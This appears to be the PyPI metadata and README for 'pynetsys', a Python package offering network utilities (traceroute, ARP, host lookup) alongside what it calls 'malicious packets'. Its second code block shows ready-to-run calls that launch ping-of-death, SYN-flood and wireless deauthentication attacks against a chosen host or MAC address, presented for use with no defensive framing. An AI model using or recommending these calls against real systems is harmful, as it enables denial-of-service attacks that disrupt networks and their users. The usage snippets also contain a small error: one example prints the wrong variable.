Metadata-Version: 2.1
Name: pynetsys
Version: 0.0.7
Summary: pynetsys is a collection of tools and malicious packets.
Home-page: https://github.com/ANDRVV/pynetsys
Author: Andrea Vaccaro (ANDRVV)
License: BSD 3 License
Keywords: python,socket,threading,server,client,packet,packets,net,network,wireless,dos,tools,tool,traceroute,arp,tracert,arping,nslookup
Platform: UNKNOWN
Classifier: Development Status :: 1 - Planning
Classifier: Intended Audience :: Developers
Classifier: Programming Language :: Python :: 3
Classifier: Operating System :: Unix
Classifier: Operating System :: MacOS :: MacOS X
Classifier: Operating System :: Microsoft :: Windows
Description-Content-Type: text/markdown
License-File: LICENSE


# PYNETSYS



pynetsys is a collection of tools and malicious packets..



Developed by Andrea Vaccaro from ANDRVV (c) 2022



# Installing



Linux, MacOS = ```pip3 install pynetsys --user```



Windows = ```pip install pynetsys --user```



# Tools



```python

import pynetsys



trace = pynetsys.tool.traceroute("python.org") --> list

print(trace)



arping = pynetsys.tool.arp() --> dict

print(arping)



hostinfo = pynetsys.tool.hostlookup("python.org") --> dict

print(hostinfo)



networks = pynetsys.tool.networkFinder() --> dict

print(hostinfo)



```



# Create malicious packet and send



```python

import pynetsys



PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)

pynetsys.packet.start(PACKET, ID, _verbose = 0)



PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)

pynetsys.packet.start(PACKET, ID, _verbose = 0)



PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)

pynetsys.packet.start(PACKET, ID, _verbose = 0)



```

